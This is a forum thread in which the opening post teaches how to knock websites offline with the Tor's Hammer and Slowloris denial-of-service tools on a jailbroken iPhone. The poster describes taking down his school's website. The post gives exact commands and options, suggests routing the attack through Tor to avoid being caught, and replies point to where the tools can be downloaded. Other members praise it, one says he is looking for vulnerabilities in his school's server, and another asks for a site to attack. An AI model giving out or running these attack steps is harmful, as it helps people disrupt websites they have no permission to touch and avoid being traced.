Author Topic: How to take down a site in under 2 mins.!  (Read 12510 times)

h4ck3rpr0n3

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 3063
  • Reputation: 130
  • Developer, Genius :P :P
  • Badges:
  • Computers: HP Pavillion g7: Windows 7, BT5 R1, Ubuntu 12.04, Windows 8, Linux Mint
  • iDevices: ipod touch 3g, ipod touch 2g
How to take down a site in under 2 mins.!
« on: October 19, 2011, 10:36:20 pm »
In this tutorial i'm going to teach you how i took down my school's wevsite in under 2 mins. so you can learn how. This can be applied to all sires but don't do anything stupud. ;) ;) This was requested by itouch_hacker so there you go, now let's begin!

before...



What you need
1. An idevice (duh!)
2. Mobile terminal (found on cydia)
3. Tor (not necessary but recommended if you don't want to get caught)
4. Tors hammer
5. Slowloris
6. A brain (not needed but recommended

Steps

For Tors hammer:

1. Open mobile terminal
2. Log into root
su
password (default is alpine)
3. Navigate to the correct directory
cd /var/mobile/pentest/exploits/torshammer
or wherever you need to go.
4.Now to use it.
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]



-t = target (hostname, ip)
-r = threads <number of threads> (default to 256)
-p = port <webserver port> (defaults to 80)
-T = Tor enable anonymizing through tor on 127.0.0.1
-h = help




For Slowloris:

1. Open mobile terminal
2. Log into root (instructions above)
3. Type slowloris
4. then type the following...
perl /usr/local/bin/slowloris -dns [www.examplewebsite.com] (also works with ip's) -options



5.then every 60 seconds it will work it's magic! (mines 10 because i changed it haha)



i recommend using both (i have to, otherwise it takes forever)

and here's the result...



******NOTE*****this usually only works for apache.

i hope you enjoyed this tutorial and don't forget to clickity clack that +1 button! ;) ;)
« Last Edit: October 20, 2011, 02:27:38 pm by h4ck3rpr0n3 »
goals:
[] get developer status
[X] get 30+ karma
[X] get to hero member
[X] become part of the staff

languages i know:
JavaScript
CSS
HTML
PHP
C
C++
Cython
Python

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 217
  • Badges:
Re: How to take down a site in under 2 mins.!
« Reply #1 on: October 20, 2011, 02:17:11 pm »
Add that it usually only works for Apache

h4ck3rpr0n3

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 3063
  • Reputation: 130
  • Developer, Genius :P :P
  • Badges:
  • Computers: HP Pavillion g7: Windows 7, BT5 R1, Ubuntu 12.04, Windows 8, Linux Mint
  • iDevices: ipod touch 3g, ipod touch 2g
Re: How to take down a site in under 2 mins.!
« Reply #2 on: October 20, 2011, 02:26:40 pm »
oh yeah! haha
goals:
[] get developer status
[X] get 30+ karma
[X] get to hero member
[X] become part of the staff

languages i know:
JavaScript
CSS
HTML
PHP
C
C++
Cython
Python

C0deH4cker

  • Hero Member
  • *****
  • Posts: 2849
  • Reputation: 129
  • I am leaving iNinjas. Contact me via email.
  • Badges:
  • iDevices: iPhone 4S 16gb Black (5.1.1), iPad 2 32gb White (5.0.1), iPod Touch 2G 8gb (4.2.1)
Re: How to take down a site in under 2 mins.!
« Reply #3 on: October 21, 2011, 08:41:51 pm »
My school uses Microsoft IIS. It uses the hit counter found in /_vti_bin/fpcount.exe or similar (cant remember for sure). Looking for vulns...

Ironman

  • Administrator
  • Hero Member
  • *****
  • Posts: 5112
  • Reputation: 252
  • Badges:
  • Computers: ASUS UL50VT
  • iDevices: iPhone 5, iPhone 4S, iPhone 4, iPhone 3GS
Re: How to take down a site in under 2 mins.!
« Reply #4 on: October 21, 2011, 10:39:42 pm »
Good job pr0n3!!
+1
Click for How to Add Our Repo
If you're going to ask questions....
At least make them good ones.

Knowledge is the one thing that can never be taken from you

Don't like seeing ads? Click here to register!

h4ck3rpr0n3

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 3063
  • Reputation: 130
  • Developer, Genius :P :P
  • Badges:
  • Computers: HP Pavillion g7: Windows 7, BT5 R1, Ubuntu 12.04, Windows 8, Linux Mint
  • iDevices: ipod touch 3g, ipod touch 2g
Re: How to take down a site in under 2 mins.!
« Reply #5 on: October 22, 2011, 02:13:47 pm »
haha thanks!
goals:
[] get developer status
[X] get 30+ karma
[X] get to hero member
[X] become part of the staff

languages i know:
JavaScript
CSS
HTML
PHP
C
C++
Cython
Python

Alex47

  • Hero Member
  • *****
  • Posts: 1370
  • Reputation: 48
  • (I can't think of something funny to go here)
  • Computers: Asus k55v, custom built self-acclaimed tank of a pc
  • iDevices: iPhone 3G, iPod touch 4g, iPod touch 2g
Re: How to take down a site in under 2 mins.!
« Reply #6 on: November 03, 2011, 04:31:38 pm »
Sorry if this is a stupid question,I'm new, where do you get tor,tors hammer and slow loris from
My Number:00110110 00110110 00110110

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 217
  • Badges:
Re: How to take down a site in under 2 mins.!
« Reply #7 on: November 03, 2011, 04:32:42 pm »
ininjas.com/repo

Modder67

  • Dev Team Member
  • Hero Member
  • *****
  • Posts: 954
  • Reputation: 26
  • Computers: asus i7 16gb ram 1tb harddrive GFX 580 3gb
  • iDevices: The New Ipad, iphone 5
Re: How to take down a site in under 2 mins.!
« Reply #8 on: November 03, 2011, 05:42:41 pm »
No question stupid as long as it's on topic and your now asking how to hack a social network :D
Goals
[X] Reach 25 karma
[X] Reach hero member
[] Become part of the staff
[] Get developer status

h4ck3rpr0n3

  • Global Moderator
  • Hero Member
  • *****
  • Posts: 3063
  • Reputation: 130
  • Developer, Genius :P :P
  • Badges:
  • Computers: HP Pavillion g7: Windows 7, BT5 R1, Ubuntu 12.04, Windows 8, Linux Mint
  • iDevices: ipod touch 3g, ipod touch 2g
Re: How to take down a site in under 2 mins.!
« Reply #9 on: November 03, 2011, 08:50:38 pm »
Sorry if this is a stupid question,I'm new, where do you get tor,tors hammer and slow loris from

ininjas.com/repo

and if you search sid77 on google you can get his repo with tor.
goals:
[] get developer status
[X] get 30+ karma
[X] get to hero member
[X] become part of the staff

languages i know:
JavaScript
CSS
HTML
PHP
C
C++
Cython
Python

Don't like seeing ads? Click here to register!

Trcx528

  • Haxor
  • Hero Member
  • *****
  • Posts: 4502
  • Reputation: 166
  • Google it!
    • iNinjas
  • Badges:
  • Computers: 13" 2011 Macbook Pro, 120 GB SSD and 16 GB of Ram
  • iDevices: None
Re: How to take down a site in under 2 mins.!
« Reply #10 on: November 03, 2011, 09:48:42 pm »
Basically, download this deb and install if, and you'll have the tor repo, a full write up is available here.

Alex47

  • Hero Member
  • *****
  • Posts: 1370
  • Reputation: 48
  • (I can't think of something funny to go here)
  • Computers: Asus k55v, custom built self-acclaimed tank of a pc
  • iDevices: iPhone 3G, iPod touch 4g, iPod touch 2g
Re: How to take down a site in under 2 mins.!
« Reply #11 on: November 04, 2011, 12:57:45 pm »
I thnx
My Number:00110110 00110110 00110110

H1K13UX

  • Newbie
  • Posts: 3
  • Reputation: 0
  • iDevices: iPod touch 4G
Re: How to take down a site in under 2 mins.!
« Reply #12 on: November 05, 2011, 09:24:10 am »
Sorry but I'm french and I didn't understand how can you get Slowloris ? I found Torhammer on the iNinja repo but not Slowloris

Trcx528

  • Haxor
  • Hero Member
  • *****
  • Posts: 4502
  • Reputation: 166
  • Google it!
    • iNinjas
  • Badges:
  • Computers: 13" 2011 Macbook Pro, 120 GB SSD and 16 GB of Ram
  • iDevices: None
Re: How to take down a site in under 2 mins.!
« Reply #13 on: November 05, 2011, 10:54:15 am »
It should be on our repo, it you can't find it here is a direct link to the deb.  A couple things that you should try is make sure that the cydia filter is set to developer, and make sure that you are using ininjas.com/repo

Karnompung

  • Noob
  • *
  • Posts: 30
  • Reputation: 1
Re: How to take down a site in under 2 mins.!
« Reply #14 on: November 07, 2011, 01:24:19 am »
Hey i want to try this out but i dont know what sites are actually safe to be hack so can anyone give me a link for me to try taking down? 8)